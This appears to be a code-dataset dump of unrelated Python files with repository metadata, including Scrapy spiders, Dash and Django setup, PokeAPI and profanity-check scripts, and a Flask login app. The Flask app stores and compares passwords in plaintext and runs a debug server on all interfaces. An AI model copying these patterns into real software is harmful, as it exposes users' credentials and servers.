    Every hook forwards what it receives unchanged; the only real behavior
    is logging when a spider opens.
    """

    @classmethod
    def from_crawler(cls, crawler):
        # Scrapy calls this to build the middleware; we also subscribe to
        # the spider_opened signal so we can log it.
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened, signal=signals.spider_opened)
        return middleware

    def process_spider_input(self, response, spider):
        # Accept every response unchanged (None means "continue processing").
        return None

    def process_spider_output(self, response, result, spider):
        # Forward every item/request the spider produced, untouched.
        yield from result

    def process_spider_exception(self, response, exception, spider):
        # No special exception handling; fall through to default behavior.
        return None

    def process_start_requests(self, start_requests, spider):
        # Forward the spider's start requests without modification.
        yield from start_requests

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
|
[
"[email protected]"
] | |
1308c8f92d220ac7b01c451288da34696bcbe3f8
|
c52ea8af6a4d3c32a0557c39d683a4d01b2188db
|
/ch10_dash_cytoscape_basic/layout/dash_cyto_grid_option_curve_style.py
|
00701dcffe65b44108634f361e1dafb4d3efea61
|
[
"MIT"
] |
permissive
|
plotly-dash-book/plotly-dash-book
|
dcde031766d17adf6fc670c8aec9c8d4e267eeb7
|
cc54f7ac6066a741f733facbd002222a87746e02
|
refs/heads/master
| 2022-06-27T02:46:25.502190 | 2022-06-08T03:21:23 | 2022-06-08T03:21:23 | 197,512,189 | 30 | 18 |
MIT
| 2021-05-31T04:47:36 | 2019-07-18T04:36:50 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,531 |
py
|
# Minimal Dash app demonstrating a Cytoscape graph laid out on a 3x6 grid
# with curved (unbundled-bezier) edges.
import dash
import dash_cytoscape as cyto
import dash_html_components as html
app = dash.Dash(__name__)
# Define 17 nodes (ids 0..16), each labeled with its own id.
nodes = [{"data": {"id": x, "label": f"{x}"}} for x in range(17)]
# Define the edges.
edges = [
    {"data": {"source": 0, "target": 1}},
    {"data": {"source": 0, "target": 2}},
    {"data": {"source": 0, "target": 3}},
    {"data": {"source": 0, "target": 4}},
    {"data": {"source": 2, "target": 3}},
    {"data": {"source": 3, "target": 4}},
    {"data": {"source": 4, "target": 5}},
    {"data": {"source": 5, "target": 1}},
    {"data": {"source": 1, "target": 6}},
    {"data": {"source": 2, "target": 7}},
    {"data": {"source": 2, "target": 8}},
    {"data": {"source": 3, "target": 9}},
    {"data": {"source": 4, "target": 10}},
    {"data": {"source": 4, "target": 11}},
    {"data": {"source": 4, "target": 12}},
    {"data": {"source": 5, "target": 13}},
    {"data": {"source": 5, "target": 14}},
    {"data": {"source": 6, "target": 15}},
]
elements = nodes + edges
cyto_compo = cyto.Cytoscape(
    id="dash_cyto_layout",
    style={"width": "400px", "height": "400px"},
    # Grid layout: nodes are placed row by row into a 3x6 grid.
    layout={"name": "grid", "rows": 3, "columns": 6},
    elements=elements,
    stylesheet=[
        {"selector": "node", "style": {"content": "data(label)"}},
        # Render edges as curved (unbundled bezier) lines.
        {"selector": "edge", "style": {"curve-style": "unbundled-bezier"}},
    ],
)
app.layout = html.Div([cyto_compo])
if __name__ == "__main__":
    app.run_server(debug=True)
|
[
"[email protected]"
] | |
a657cc0c698b514929d0eb92d4cb9c214587f5d4
|
70759e1e5b4dcf94ec3bd3a93bd563b14b8e08ad
|
/tomato.py
|
e16dfe794dd44956edc1b90d0d0a09c636de4702
|
[] |
no_license
|
akaNiknok/tomato-app
|
04b0cc4a41890c5b7108fb43404064f03a0dc60e
|
f6602b7c6d6741f81e518a7134aeab522c07865f
|
refs/heads/master
| 2021-01-10T14:58:21.279375 | 2016-01-02T04:10:22 | 2016-01-02T04:10:22 | 48,598,267 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,613 |
py
|
from flask import Flask, render_template, request, url_for, session, redirect, make_response
import sqlite3
from os import urandom, path
# Absolute directory of this file; used to locate database.db reliably.
ROOT = path.dirname(path.realpath(__file__))
app = Flask(__name__)
@app.route("/", methods=["GET", "POST"])
def index():
    """Home page; POST redirects to the country page chosen in the form."""
    if request.method == "POST":
        return redirect("/" + request.form["country"])
    if "username" in session:
        return render_template("index.html", user=session["username"])
    else:
        return render_template("index.html")
@app.route("/<country>")
def country(country):
    """Render a per-country page; the path segment is used verbatim."""
    return render_template("country.html", country=country, title=country)
@app.route("/login", methods=["GET", "POST"])
def login():
    """Log a user in by checking the password stored in SQLite."""
    # Check if the user submitted the login form
    if request.method == "POST":
        form = request.form
        # Connect to the database
        db = sqlite3.connect(path.join(ROOT, "database.db"))
        # Create a cursor
        cursor = db.cursor()
        # Get the users password from the `users` table
        # (parameterized query — safe from SQL injection).
        cursor.execute("SELECT password FROM users WHERE name=?", (form["user"],))
        # Check if the password is correct
        # If incorrect, throw an error
        # NOTE(review): passwords are compared in plaintext; they should be
        # hashed (e.g. werkzeug.security) before storage and comparison.
        try:
            if cursor.fetchone()[0] != form["pwd"]:
                db.close()
                return render_template("login.html", error=True)
        except TypeError:  # Throws a TypeError if the user is not yet registered
            db.close()
            return render_template("login.html", error=True)
        # Else, set `username` in `session` to the `user`
        session['username'] = form["user"]
        db.close()  # Close the connection
        return redirect("/")
    return render_template("login.html")
@app.route("/logout")
def logout():
    """Clear the session and return to the home page."""
    session.pop('username', None)
    return redirect("/")
@app.route("/register", methods=["GET", "POST"])
def register():
    """Create a new user row from the registration form."""
    # Check if the user submitted the register form
    if request.method == "POST":
        form = request.form
        # Connect to the database
        db = sqlite3.connect(path.join(ROOT, "database.db"))
        # Create a cursor
        cursor = db.cursor()
        # Add the information to the `users` table
        # NOTE(review): password is stored in plaintext — see login().
        cursor.execute("INSERT INTO users(name, email, password) VALUES(?,?,?)", (form["user"], form["email"], form["pwd"]))
        db.commit()  # Save the changes
        db.close()  # Close the connection
        return redirect("/")
    return render_template("register.html")
# Set the super duper secret-ish key :P
# NOTE(review): a random key per process restart invalidates all existing
# sessions on every restart; a fixed secret from config is the usual fix.
app.secret_key = urandom(24)
if __name__=="__main__":
    app.run(host="0.0.0.0", debug=True)
|
[
"[email protected]"
] | |
7254429fac5007af3e944345732a89d7e762e82f
|
3bb04e209b3cbd9a392b55f82b373810847cebd3
|
/processing/utils.py
|
c84f3d46927c2e04151aa7d9b8d4c8d91bf2f3d5
|
[
"MIT"
] |
permissive
|
mas2df/racefinder
|
016d60b850c06c31242d3cbf26cf894b6485a816
|
c866523a9b174fa3c2f0a95e4aad242ae8dcd345
|
refs/heads/master
| 2020-12-24T13:28:07.680588 | 2014-10-10T17:58:18 | 2014-10-10T17:58:18 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,913 |
py
|
import re
def getDistanceUnitAndType(value):
pattern = re.compile(ur"(\d+(\.\d+)?)?([KMH])?\s?([\x20-\x7E]+)")
(distance, decimal, unit, type) = re.findall(pattern, value)[0]
return (distance, unit, type)
def getDistanceAndType(value):
(distance, unit, type) = getDistanceUnitAndType(value)
combined = ""
if (distance and unit):
combined = " ".join([distance, unit])
return (combined, type)
states = {
'AK': 'Alaska',
'AL': 'Alabama',
'AR': 'Arkansas',
'AZ': 'Arizona',
'CA': 'California',
'CO': 'Colorado',
'CT': 'Connecticut',
'DC': 'District of Columbia',
'DE': 'Delaware',
'FL': 'Florida',
'GA': 'Georgia',
'GU': 'Guam',
'HI': 'Hawaii',
'IA': 'Iowa',
'ID': 'Idaho',
'IL': 'Illinois',
'IN': 'Indiana',
'KS': 'Kansas',
'KY': 'Kentucky',
'LA': 'Louisiana',
'MA': 'Massachusetts',
'MD': 'Maryland',
'ME': 'Maine',
'MI': 'Michigan',
'MN': 'Minnesota',
'MO': 'Missouri',
'MS': 'Mississippi',
'MT': 'Montana',
'NA': 'National',
'NC': 'North Carolina',
'ND': 'North Dakota',
'NE': 'Nebraska',
'NH': 'New Hampshire',
'NJ': 'New Jersey',
'NM': 'New Mexico',
'NV': 'Nevada',
'NY': 'New York',
'OH': 'Ohio',
'OK': 'Oklahoma',
'OR': 'Oregon',
'PA': 'Pennsylvania',
'PR': 'Puerto Rico',
'RI': 'Rhode Island',
'SC': 'South Carolina',
'SD': 'South Dakota',
'TN': 'Tennessee',
'TX': 'Texas',
'UT': 'Utah',
'VA': 'Virginia',
'VI': 'Virgin Islands',
'VT': 'Vermont',
'WA': 'Washington',
'WI': 'Wisconsin',
'WV': 'West Virginia',
'WY': 'Wyoming'
}
|
[
"[email protected]"
] | |
2f66556113594253cc5a56e9e92b8cca93f1eb80
|
ee43ebd0a06bee2f700e8491e481bf3c5edde9fb
|
/projeto_redacao/urls.py
|
168aea0a9e49ba785312668b688a1f67e66f93a6
|
[] |
no_license
|
heloisaGuimaraes/proofreader
|
c5ed4ec46773cbeab5405a71430bd8f9d60861c2
|
aa7a2d9ec8ea2cff9a89b8a15a2dd2a9a7f385cb
|
refs/heads/master
| 2022-10-19T09:07:25.574371 | 2020-06-12T03:41:23 | 2020-06-12T03:41:23 | 271,701,258 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,024 |
py
|
"""projeto_redacao URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from . import settings
from django.conf.urls.static import static
urlpatterns = [
    path('admin/', admin.site.urls),
]

# Serve user-uploaded media files in development only.
# Fixed: the original called static(settings.MEDIA_ROOT, ...), passing a
# filesystem path as the URL prefix — that pattern could never match a
# request. The URL prefix must be MEDIA_URL; the duplicate call is dropped.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"[email protected]"
] | |
8819b9fcfe6bcf3b5c61a314d5b3b7d97b749e79
|
5440e66a6ab273cb75293677fbe3d1fe9267bfe0
|
/check_profanity.py
|
b065ccb4a183d42051ff71bdd36a180e9f85df01
|
[
"Apache-2.0"
] |
permissive
|
qingzhizhu/QingPython
|
f439c51f14c1e4672361e5a7fdc28f2ff01c9a98
|
c6f2258caf2edab4c8f5afe5bb2c974f318e50c7
|
refs/heads/master
| 2020-03-24T06:16:06.327547 | 2018-09-21T09:34:57 | 2018-09-21T09:34:57 | 142,522,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 833 |
py
|
#!/usr/bin/python
#coding=utf-8
# desc: checks a text file for profanity via a web API (Python 2 only)
#author:[email protected]
import os,sys
import urllib
DIR=os.getcwd()
def check_profanity(text):
    """Query the wdylike web service and report whether *text* contains profanity.

    The service answers "true"/"false" in its response body.
    NOTE(review): *text* is interpolated into the URL without escaping
    (urllib.quote) — spaces/special characters may break the request.
    """
    connection = urllib.urlopen("http://www.wdylike.appspot.com/?q="+text)
    output = connection.read()
    print(output)
    connection.close()
    if "true" in output:
        print("Profanity Alert! 有敏感词")
    elif "false" in output:
        print("OK!this document has no curse words.")
    else:
        print("Could not scan the document properly.")
def read_text():
    """Read movie_quotes.txt from the current working directory and scan it."""
    quotes = open(DIR+"/movie_quotes.txt")
    contents = quotes.read()
    #print(contents)
    quotes.close()
    check_profanity(contents)
if __name__ == "__main__":
    # for arg in sys.argv:
    #     print(arg)
    print("file:", sys.argv[0])
    for i in range(1, len(sys.argv)):
        print("param:", i, sys.argv[i])
    read_text()
|
[
"[email protected]"
] | |
a6be9d570514b770b12cd026d69be6ad9174e1eb
|
7c246e0046136c7ab200ebf5a7e8fe772bd0738b
|
/02_django/css01/css/urls.py
|
de2d2f568f2315ed7bcf65c575c4dcfdb29a1fdd
|
[] |
no_license
|
name-chichi/KDT-BigData
|
d6d87557945b6dc5c3dd7126a718f6de147f6d7b
|
6bac43fdaf0b0be94996f2fab65f59916d500395
|
refs/heads/main
| 2023-06-30T07:04:54.296238 | 2021-07-30T03:09:54 | 2021-07-30T03:09:54 | 374,502,002 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 865 |
py
|
"""config URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from css import views
# URL routes for the css demo app: admin site plus two template views.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', views.home, name='home'),
    path('html5', views.html5, name='html5'),
]
|
[
"[email protected]"
] | |
6c6ea3cf2a17e60d0440efa850fed227e5baec5c
|
8ac3ef229436abdb2a9ae4c428ab1f62148897a3
|
/Vijay_Sir/22-04-2021/Inheritance_constractor_importance.py
|
c5927a5485ce1bbd3b3d5f19bf3a638686d24efb
|
[] |
no_license
|
udayreddy026/pdemo_Python
|
358e01cf6599e1bea3f787e6dfae2d039ee66668
|
6b7272fe205053141ed273ae70beb4358a4071f2
|
refs/heads/main
| 2023-05-01T04:33:40.558187 | 2021-05-14T07:06:20 | 2021-05-14T07:06:20 | 349,928,315 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 329 |
py
|
class A:
    """Demo class: ``y`` is shared at class level, ``x`` lives per instance."""

    y = 20

    def __init__(self):
        # Instance attribute; note class A itself never gets an ``x``.
        self.x = 30

    def m1(self):
        # Double the instance value, then accumulate it into the class value.
        self.x += self.x
        A.y += self.x


class B(A):
    """Subclass relying on A's inherited constructor."""

    def m1(self):
        # NOTE: calling this would raise AttributeError — class A has no
        # attribute ``x``; it is only ever assigned on instances.
        A.x = self.x + A.x


a = A()
a.m1()
print(A.y, a.x)
|
[
"udayreddy026gmail.com"
] |
udayreddy026gmail.com
|
93adf05fb8e78616581a275936e16a2c12ad1582
|
f82757475ea13965581c2147ff57123b361c5d62
|
/gi-stubs/repository/Clutter/ZoomActionPrivate.py
|
30f46ad6d498ed3b8d07dbaaa947fec7334f3b73
|
[] |
no_license
|
ttys3/pygobject-stubs
|
9b15d1b473db06f47e5ffba5ad0a31d6d1becb57
|
d0e6e93399212aada4386d2ce80344eb9a31db48
|
refs/heads/master
| 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null |
UTF-8
|
Python
| false | false | 4,403 |
py
|
# encoding: utf-8
# module gi.repository.Clutter
# from /usr/lib64/girepository-1.0/Clutter-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gi.repository.Atk as __gi_repository_Atk
import gi.repository.GObject as __gi_repository_GObject
import gobject as __gobject
class ZoomActionPrivate(__gi.Struct):
    """Auto-generated stub for Clutter's opaque ZoomActionPrivate struct.

    Every dunder below is a placeholder whose real signature is unknown to
    the generator; bodies are ``pass`` because this module only exists to
    give IDEs introspection data, not to be executed.
    """
    def __delattr__(self, *args, **kwargs): # real signature unknown
        """ Implement delattr(self, name). """
        pass
    def __dir__(self, *args, **kwargs): # real signature unknown
        """ Default dir() implementation. """
        pass
    def __eq__(self, *args, **kwargs): # real signature unknown
        """ Return self==value. """
        pass
    def __format__(self, *args, **kwargs): # real signature unknown
        """ Default object formatter. """
        pass
    def __getattribute__(self, *args, **kwargs): # real signature unknown
        """ Return getattr(self, name). """
        pass
    def __ge__(self, *args, **kwargs): # real signature unknown
        """ Return self>=value. """
        pass
    def __gt__(self, *args, **kwargs): # real signature unknown
        """ Return self>value. """
        pass
    def __hash__(self, *args, **kwargs): # real signature unknown
        """ Return hash(self). """
        pass
    def __init_subclass__(self, *args, **kwargs): # real signature unknown
        """
        This method is called when a class is subclassed.
        The default implementation does nothing. It may be
        overridden to extend subclasses.
        """
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    def __le__(self, *args, **kwargs): # real signature unknown
        """ Return self<=value. """
        pass
    def __lt__(self, *args, **kwargs): # real signature unknown
        """ Return self<value. """
        pass
    @staticmethod # known case of __new__
    def __new__(*args, **kwargs): # real signature unknown
        """ Create and return a new object.  See help(type) for accurate signature. """
        pass
    def __ne__(self, *args, **kwargs): # real signature unknown
        """ Return self!=value. """
        pass
    def __reduce_ex__(self, *args, **kwargs): # real signature unknown
        """ Helper for pickle. """
        pass
    def __reduce__(self, *args, **kwargs): # real signature unknown
        """ Helper for pickle. """
        pass
    def __repr__(self, *args, **kwargs): # real signature unknown
        """ Return repr(self). """
        pass
    def __setattr__(self, *args, **kwargs): # real signature unknown
        """ Implement setattr(self, name, value). """
        pass
    def __sizeof__(self, *args, **kwargs): # real signature unknown
        """ Size of object in memory, in bytes. """
        pass
    def __str__(self, *args, **kwargs): # real signature unknown
        """ Return str(self). """
        pass
    def __subclasshook__(self, *args, **kwargs): # real signature unknown
        """
        Abstract classes can override this to customize issubclass().
        This is invoked early on by abc.ABCMeta.__subclasscheck__().
        It should return True, False or NotImplemented.  If it returns
        NotImplemented, the normal algorithm is used.  Otherwise, it
        overrides the normal algorithm (and the outcome is cached).
        """
        pass
    def __weakref__(self, *args, **kwargs): # real signature unknown
        pass
    # Class-level metadata filled in by the stub generator; the strings show
    # the values observed at generation time.
    __class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
    __dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(ZoomActionPrivate), '__module__': 'gi.repository.Clutter', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'ZoomActionPrivate' objects>, '__weakref__': <attribute '__weakref__' of 'ZoomActionPrivate' objects>, '__doc__': None})"
    __gtype__ = None # (!) real value is '<GType void (4)>'
    __info__ = StructInfo(ZoomActionPrivate)
|
[
"[email protected]"
] | |
7cd66ff25eba5bc3b16202ba9e93dccd733556ea
|
13ced67131fc3569e9380a1abf610309450fcafa
|
/yatagarasu/spiders/match.py
|
ade26b2280d76271440b4fa2f8c2e2b1755854ba
|
[
"MIT"
] |
permissive
|
h-mineta/yatagarasu
|
96724e4b0de1041e11cac65ec62700307c932546
|
d5fc2878e3dd26f576c738028d4e3d0f8d5abe5d
|
refs/heads/master
| 2020-03-10T14:24:14.322704 | 2018-04-16T13:36:43 | 2018-04-16T13:36:43 | 129,425,292 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,068 |
py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 h-mineta <[email protected]>
# This software is released under the MIT License.
#
from yatagarasu.items import MatchItem
import re
import scrapy
import mojimoji
class MatchSpider(scrapy.Spider):
    """Scrape J.League match schedule pages into MatchItem records."""
    name = 'match'
    allowed_domains = [
        'www.jleague.jp'
    ]
    start_urls = []
    def __init__(self, settings, *args, **kwargs):
        # Load start URLs from the file named by the START_URLS_MATCH setting,
        # keeping only non-empty lines that look like http(s) URLs.
        super(MatchSpider, self).__init__(*args, **kwargs)
        with open(settings.get("START_URLS_MATCH"), 'r') as file:
            urls = file.readlines()
            for url in urls:
                url = url.rstrip("\n")
                if url != "\n" and re.match(r"^https?.*", url) != None:
                    self.start_urls.append(url)
    @classmethod
    def from_crawler(cls, crawler):
        # Pass crawler settings into the constructor so __init__ can read them.
        return cls(settings = crawler.settings)
    def parse(self, response):
        # Each matchlistWrap section holds one date header plus a table of matches.
        for match_selection in response.xpath('//div[@class="content"]/div[@class="main"]/section[@class="scheduleArea"]/section[@class="contentBlock"]/section[@class="matchlistWrap"]'):
            # Extract YYYY/MM/DD from the Japanese date header (e.g. 2018年4月14日).
            matches = match_selection.xpath('div[@class="timeStamp"]/h4/text()').re('^(\d{4})年(\d{1,2})月(\d{1,2})日')
            if matches:
                match_date = "{0:d}-{1:02d}-{2:02d}".format(int(matches[0]), int(matches[1]), int(matches[2]))
            for match_table in match_selection.xpath('table[@class="matchTable"]/tbody').xpath('tr'):
                item = None
                try:
                    # Match URLs look like /match/<league>/<year>/<6-digit id>/;
                    # the numeric id is year*1e6 + per-year sequence.
                    url = match_table.xpath('td[contains(@class,"match")]/a/@href').get()
                    matches = re.match(r'^/match/([\d\w]{2,16})/(\d{4})/(\d{6})/', url)
                    if matches:
                        item = MatchItem()
                        item['url'] = matches.group(0)
                        item['league'] = matches.group(1)
                        item['id'] = int(matches.group(2)) * 1000000 + int(matches.group(3))
                except Exception as ex:
                    # Failed to extract the match ID; skip this row.
                    continue
                match_time = match_table.xpath('td[@class="stadium"]/text()').re_first(r'^(\d{2}:\d{2})')
                if match_time:
                    item['kickoff_date'] = match_date
                    item['kickoff_time'] = match_time
                    try:
                        item['club_id_home'] = match_table.xpath('td[contains(@class,"match")]//td[@class="clubName leftside"]/a/@href').re_first(r'^/club/([^/]+)/')
                        item['club_id_away'] = match_table.xpath('td[contains(@class,"match")]//td[@class="clubName rightside"]/a/@href').re_first(r'^/club/([^/]+)/')
                    except Exception as ex:
                        # Row is a note, not match information; move to the next <tr>.
                        continue
                    item['status'] = None
                    item['club_point_home'] = None
                    item['club_point_away'] = None
                    item['stadium_name'] = mojimoji.zen_to_han(match_table.xpath('td[@class="stadium"]/a/text()').get(), kana=False)
                    try:
                        item['club_point_home'] = int(match_table.xpath('td[contains(@class,"match")]//td[@class="point leftside"]/text()').get())
                        item['club_point_away'] = int(match_table.xpath('td[contains(@class,"match")]//td[@class="point rightside"]/text()').get())
                    except Exception as ex:
                        # No score yet — treat the match as not played.
                        item['club_point_home'] = None
                        item['club_point_away'] = None
                        item['status'] = match_table.xpath('td[contains(@class,"match")]//td[@class="status"]//span/@class').get()
                    yield item
                else:
                    # Kickoff time not decided yet; skip the row.
                    continue
|
[
"[email protected]"
] | |
94dc0dfabc4bdc458a90b979dc28da65b91a1a81
|
bfe8a7abec489fbbec72ff5baa2b40e5c104fe88
|
/ 6-Rozsyłanie grupowe UDP/multicastClient.py
|
ce102d39f7d2aa97ef4f5f4f4b6e6adb6e56a285
|
[] |
no_license
|
tobiashiro/Programowanie-Sieciowe
|
d057e927e30c6b51444a10696ecf76ee24d4c15c
|
eac8a105e2597f1f94b01e4d806994ceadc075c3
|
refs/heads/master
| 2023-03-11T18:04:32.027450 | 2021-02-28T21:52:49 | 2021-02-28T21:52:49 | 338,399,853 | 0 | 0 | null | 2021-02-26T21:22:09 | 2021-02-12T18:26:38 |
Python
|
UTF-8
|
Python
| false | false | 2,593 |
py
|
import socket, logging, time
import struct
import sys
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-9s,) %(message)s',)
class MulticastClient:
    """Interactive UDP multicast sender: prompts for a message/group, sends
    it, then collects responses until the socket times out."""
    def __init__(self):
        # Bare annotations below declare types only; they assign nothing.
        self.message: str
        self.host: str
        self.port: int
        self.host = ""
        self.port = 0
        self.multicast_group = (self.host, self.port)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    def start_client(self):
        """Read message, group address and port from stdin (with defaults)."""
        try:
            logging.debug("Multicast Client start")
            time.sleep(0.5)
            self.message = bytes(input("Type your Multi-message: ").encode())
            self.host = str(input("UDP client IP or domain name (default: 224.3.29.71): "))
            if len(self.host) == 0:
                self.host = "224.3.29.71"
            self.port = input("Listening port (default - 7): ")
            if len(self.port) == 0:
                self.port = 7
            elif self.port.isnumeric():
                self.port = int(self.port)
            else:
                raise Exception("You put incorrect format")
            self.multicast_group = ('{}'.format(self.host), self.port)
        except Exception as e:
            # Any bad input aborts the whole process.
            logging.warning("You put incorrect input data. Exepction message: {}".format(e))
            sys.exit(1)
        logging.debug("If you want to finish - type 'quit' ")
    def create_datagram_socket(self):
        """Configure the socket: short timeout and TTL=1 (local subnet only)."""
        # Set a timeout so the socket does not block indefinitely when trying
        # to receive data.
        self.sock.settimeout(0.2)
        ttl = struct.pack('b', 1)
        self.sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)
    def send_message(self):
        """Send the message and log every response until a recv timeout."""
        try:
            # Send data to the multicast group
            logging.debug("Sending message to multicast: {}".format(self.message))
            self.sock.sendto(self.message, self.multicast_group)
            # Look for responses from all recipients
            while True:
                logging.debug("waiting to recive")
                try:
                    data, server = self.sock.recvfrom(16)
                except socket.timeout:
                    logging.debug('timed out, no more responses')
                    break
                else:
                    logging.debug("received {} from {}".format(data, server))
        finally:
            # Socket is always closed, even on errors; the client is one-shot.
            logging.debug("closing socket")
            self.sock.close()
    def run(self, event):
        """Entry point for threaded use: wait for *event*, then do one send cycle."""
        event.wait()
        self.start_client()
        self.create_datagram_socket()
        self.send_message()
|
[
"[email protected]"
] | |
49b7c6233cb3d031e79f2710167aae956de76e29
|
55a281d728541773e6eda896599c0cc48dfe5156
|
/Advanced/venv/Scripts/easy_install-script.py
|
8e473e4d78117e10d75b080582317f8367fd492a
|
[] |
no_license
|
dhariskov/python-advanced
|
c0bebd937f3849dd62ae2834cbdf9f8100b2bb56
|
4725070c960d3c234ed2f20ff2156e2f89514a02
|
refs/heads/master
| 2022-12-04T22:40:18.485552 | 2020-08-28T08:29:25 | 2020-08-28T08:29:25 | 288,775,775 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 450 |
py
|
#!C:\Users\Acer\PycharmProjects\Advanced\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
# Auto-generated console-script wrapper created by setuptools; it strips the
# script/exe suffix from argv[0] and dispatches to the easy_install entry point.
# Do not edit by hand.
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
    )
|
[
"[email protected]"
] | |
6cf4548fab5f9a425ac47424c3ec0ab24bf069e9
|
91f023d744710386c6d2baec138e4a2496ee8969
|
/manage.py
|
85e5b0dc70f6f69c6dcd5778870b199d2b3aec53
|
[] |
no_license
|
miquel-corral/crppdmt
|
4ae653393e26a55175a5a4f05950a44b262bfc93
|
a44088a4476fca96891733a243de414be5952bb0
|
refs/heads/master
| 2020-05-05T13:13:31.121093 | 2015-11-02T15:08:23 | 2015-11-02T15:08:23 | 34,043,005 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 250 |
py
|
#!/usr/bin/env python
# Standard Django management entry point (generated by startproject).
import os
import sys
if __name__ == "__main__":
    # Point Django at this project's settings module before dispatching.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "crppdmt.settings")
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
|
[
"[email protected]"
] | |
e13cb7e0d1b29cfbd3d7a6ae4d6a717365159901
|
08b49c36e221b9b4a68f7eba96239a5a8971cac5
|
/D02/ex05/the_only_true_pokemons.py
|
77d5446bd028cc0643376cace8a3497723a6389e
|
[] |
no_license
|
qbarrier/Python
|
1a5c6247fe3eaa126a3a8a05832affe66cdfd3d2
|
12e7852dbdcb055a5d7bf04e3ef00f66d26740ff
|
refs/heads/master
| 2020-07-07T13:36:24.361771 | 2019-08-22T06:34:19 | 2019-08-22T06:34:19 | 203,363,031 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 462 |
py
|
import requests
import json


def ft_first_gen():
    """Fetch the first 150 (gen-1) pokemon from PokeAPI and dump them to
    the_only_true_pokemons.json as a list of {index: name} dicts.

    Fixed: the output file is now opened with a context manager, so the
    handle is closed even if json serialization fails; the manual index
    counter is replaced by enumerate(start=1) with identical output.
    """
    req = requests.get('https://pokeapi.co/api/v2/pokemon/?limit=150')
    req = req.json()
    # 1-based index keyed dicts, matching the original manual counter.
    list_pk = [{index: entry['name']}
               for index, entry in enumerate(req['results'], start=1)]
    with open("the_only_true_pokemons.json", "w") as f:
        f.write("%s\n" % json.dumps(list_pk))


if __name__ == '__main__':
    ft_first_gen()
|
[
"[email protected]"
] | |
25e1d7c4b496e1d13bf633c73b7f2d3e557bf8bc
|
04d3309a1618ba8bc1aac5ead238d3368b44472d
|
/18.7 Transform one string to another/main.py
|
f1cc25e5b41bd397e2fcbcd7347bbfca5febea23
|
[] |
no_license
|
cunghaw/Elements-Of-Programming
|
76ae0aabbd53f21c8472e73aa5190afdd2821826
|
3fce8c699f37913e1838fba1691f38058bfbd4c8
|
refs/heads/master
| 2021-04-09T13:54:52.006731 | 2018-05-13T02:02:30 | 2018-05-13T02:02:30 | 125,673,746 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,881 |
py
|
# -*- coding: utf-8 -*-
"""
Transform one string to another.
@author: Ronny
"""
def calcDistance(str1, str2):
    """Hamming-style distance over the overlapping prefix of two strings.

    Positions beyond the shorter string are ignored (zip truncates).
    """
    return sum(ch_a != ch_b for ch_a, ch_b in zip(str1, str2))
def getClosestNeighbors(str1, setWords):
    """Return every word in *setWords* exactly one substitution from *str1*."""
    return {word for word in setWords if calcDistance(str1, word) == 1}
def transform( start, end, setWords ):
    """Recursively search for a shortest word ladder from *start* to *end*.

    Each step changes exactly one character and must land in *setWords*.
    Returns the path as a list of words ([] if no ladder exists).
    NOTE(review): when several neighbors yield equally short paths, the
    loop appends *all* of them to result (result = result + v per tie),
    so ties can produce a concatenated, longer-than-shortest list; set
    iteration order (hash randomization) decides which path wins.
    """
    if start == end:
        return [start]
    else:
